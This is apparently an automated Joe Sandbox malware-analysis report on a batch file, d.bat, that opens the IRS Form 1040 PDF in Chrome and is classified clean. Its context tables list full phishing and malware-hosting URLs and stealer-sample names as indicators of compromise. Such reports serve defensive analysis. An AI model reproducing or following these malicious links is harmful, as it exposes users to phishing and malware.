Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d.bat

Overview

General Information

Sample name:d.bat
Analysis ID:1431649
MD5:ff72478478ffdc769b1e68ebcae78ce7
SHA1:de0dcdc73c62b379b197f85665d0f79ffd503e8c
SHA256:37078a400954db8edd7717afb95f22d7fe119efedc4691bff4e7ca2470ece1c8
Tags:bat
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Creates a process in suspended mode (likely to inject code)
Drops files with a non-matching file extension (content does not match file extension)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\d.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 4036 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,8690622242313858414,1291820735043739184,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://www.irs.gov/pub/irs-pdf/f1040.pdfHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/downloaded.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mS8f1Gbn84nXFYB&MD=Pu3PAxcs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mS8f1Gbn84nXFYB&MD=Pu3PAxcs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: www.irs.gov
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: chromecache_65.5.dr, downloaded.pdf.crdownload.2.drString found in binary or memory: http://www.aiim.org/pdfua/ns/id/
Source: d.batString found in binary or memory: https://www.irs.gov/pub/irs-pdf/f1040.pdf
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: classification engineClassification label: clean3.winBAT@22/14@6/3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\e016da71-7c2d-48ea-b712-49cde78c4486.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\d.bat" "
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\d.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,8690622242313858414,1291820735043739184,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,8690622242313858414,1291820735043739184,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 65
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 65Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.irs.gov/pub/irs-pdf/f1040.pdfJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
11
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1431649 Sample: d.bat Startdate: 25/04/2024 Architecture: WINDOWS Score: 3 6 cmd.exe 13 2->6         started        process3 8 chrome.exe 20 6->8         started        11 conhost.exe 6->11         started        dnsIp4 16 192.168.2.5, 443, 49703, 49717 unknown unknown 8->16 18 239.255.255.250 unknown Reserved 8->18 13 chrome.exe 8->13         started        process5 dnsIp6 20 www.google.com 142.250.9.104, 443, 49717, 49726 GOOGLEUS United States 13->20 22 www.irs.gov 13->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Downloads/downloaded.pdf0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
142.250.9.104
truefalse
    high
    www.irs.gov
    unknown
    unknownfalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://www.irs.gov/pub/irs-pdf/f1040.pdffalse
        high
        file:///C:/Users/user/Downloads/downloaded.pdffalse
        • Avira URL Cloud: safe
        low
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.aiim.org/pdfua/ns/id/chromecache_65.5.dr, downloaded.pdf.crdownload.2.drfalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          142.250.9.104
          www.google.comUnited States
          15169GOOGLEUSfalse
          IP
          192.168.2.5
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1431649
          Start date and time:2024-04-25 15:11:10 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 22s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:d.bat
          Detection:CLEAN
          Classification:clean3.winBAT@22/14@6/3
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .bat
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 74.125.136.94, 23.223.135.219, 172.253.124.100, 172.253.124.101, 172.253.124.102, 172.253.124.138, 172.253.124.113, 172.253.124.139, 142.251.15.84, 34.104.35.123, 192.229.211.108, 199.232.214.172, 74.125.138.94, 23.40.205.49, 74.125.136.138, 74.125.136.139, 74.125.136.102, 74.125.136.100, 74.125.136.101, 74.125.136.113
          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, www.irs.gov.edgekey.net, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e3920.dscna.akamaiedge.net, update.googleapis.com, clients.l.google.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenFile calls found.
          No simulations
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          239.255.255.250https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/o76fri/enpmZG9tbF9zdXBlcnZpc29yMXN0X2Fzc2lzdGFudEBmZC5vcmc=Get hashmaliciousHTMLPhisherBrowse
            Air Transport Services Group Open Benefits Enrollment.emlGet hashmaliciousUnknownBrowse
              Isass.exeGet hashmaliciousUnknownBrowse
                Isass.exeGet hashmaliciousUnknownBrowse
                  https://us-west-2.protection.sophos.com/?d=google.co.za&u=aHR0cHM6Ly9nb29nbGUuY28uemEvYW1wL3Mvd3d3Lmdvb2dsZS5jb20lMkZ1cmwlM0ZzYSUzREQlMjZxJTNEaHR0cHMlM0ElMkYlMkZlbWFpbGluZy5taXJhYmF1ZC1hbS5jb20lMkZ0bC5waHAlMjUzRnAlMjUzRDVwMCUyRnQyJTJGcnMlMkYxZTYlMkZyeSUyRnJzJTJGJTJGaHR0cHMlM0ElMkYlMkZmaXJlYmFzZXN0b3JhZ2UuZ29vZ2xlYXBpcy5jb20lMjUyNTJGdjAlMjUyNTJGYiUyNTI1MkZteS1hd2Vzb21lLXByb2plY3QtaWQtMzU4ODkuYXBwc3BvdC5jb20lMjUyNTJGbyUyNTI1MkZzb3NmcmUuaHRtbCUyNTI1M0ZhbHQlMjUyNTNEbWVkaWElMjUyNTI2dG9rZW4lMjUyNTNENzBmZDlmZWMtZWM4Mi00YjQ1LTkwMmQtMmFhM2Q3NTgwYzNiJTI2dXN0JTNEMTcxNDEyMzE0MDAwMDAwMCUyNnVzZyUzREFPdlZhdzJ5SzhVRkpvWmVuUkRWdUJMLXNmY20lMjZobCUzRGVuJTI2c291cmNlJTNEZ21haWwjYTJ4MVkyRnpRR04wYlhOdmFHbHZMbU52YlE9PQ==&p=m&i=NjFjOWM1NjJmM2YxNmYxMDA2OTJjYWZj&t=THJkcUUxZW9PQzAvNFZ0aWxoalJFOStYQ0dWVXgvYjJ6aS82eTZoUDhJcz0=&h=276fada438bf49c2be0403c28d11d4f4&s=AVNPUEhUT0NFTkNSWVBUSVZ-gOCnEu8L0hbaTxie_PLqb02g0uIV3TDGiGYGiGwGbDIPB11limBksw9z8tTzOiKEbBHGOtpfybJD4FbJxpna6swSu6rycA6MG9n6CTc4aMLN4lGfbapv3cHB_2jaSF4Get hashmaliciousHTMLPhisherBrowse
                    https://www.highcpmgate.com/vdvpyk3j?key=f2b21af2cea51f467a32bdc200d0bff7Get hashmaliciousUnknownBrowse
                      https://1drv.ms/o/s!AmFI0faGJpjZhESzK-ltQ-Z_UHmf?e=0OfhLSGet hashmaliciousUnknownBrowse
                        https://pub-02d879d6055b4f31b3db7cbbb1499011.r2.dev/%60%60~~~%5D%5D%5D%5D%5D.html#theunis@khk.co.zaGet hashmaliciousHTMLPhisherBrowse
                          https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                            http://185.172.128.63/v8sjh3hs8/index.phpGet hashmaliciousUnknownBrowse
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              28a2c9bd18a11de089ef85a160da29e4Air Transport Services Group Open Benefits Enrollment.emlGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              Isass.exeGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              Isass.exeGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              https://1drv.ms/o/s!AmFI0faGJpjZhESzK-ltQ-Z_UHmf?e=0OfhLSGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              https://content.amanet.org/?m=CiGW.81UwlU3LD6ZH5M4ZoUXv03dAeWfC&r=https://control.mailblaze.com/index.php/survey/ps97367sjy584Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              http://185.172.128.63/v8sjh3hs8/index.phpGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              https://www.mavengroupglobal.uk/DYuPhO4h/v?url=qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1#qs6eqSurmcWXoQKf6zcjhg6iePdEghHaDt49dq0x39xgLRd6M1EFEEZ2FicmllbC5wYXJ2dWxlc2N1QGRldXRzY2hlYmFobi5jb20=Get hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              https://www.canva.com/design/DAGDNh45X_4/PPCLYIV4Y8uUaoEW7ZJrJQ/view?utm_content=DAGDNh45X_4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              R0hb7jyBcv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                              • 52.165.165.26
                              • 184.31.62.93
                              No context
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:12:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.979057681936079
                              Encrypted:false
                              SSDEEP:48:8SdTTbv/HfidAKZdA19ehwiZUklqehTy+3:86vZsy
                              MD5:DB39BFAB7983A1D0C19C7CD555B7F1F5
                              SHA1:FCF24029FF1C651A6CFAB744EBFB5612330699C7
                              SHA-256:2DAAC444C93A503968274C3CECE2E69556315448AA4A04F46079592A19DB5681
                              SHA-512:33BD033BD074E127EE718116E10D1732939B2C078619910253DA3BC58550C467A7F39E858B2E8EC12B92A49D23D1DA1F3AC2311A80288939B7C34819772B3932
                              Malicious:false
                              Reputation:low
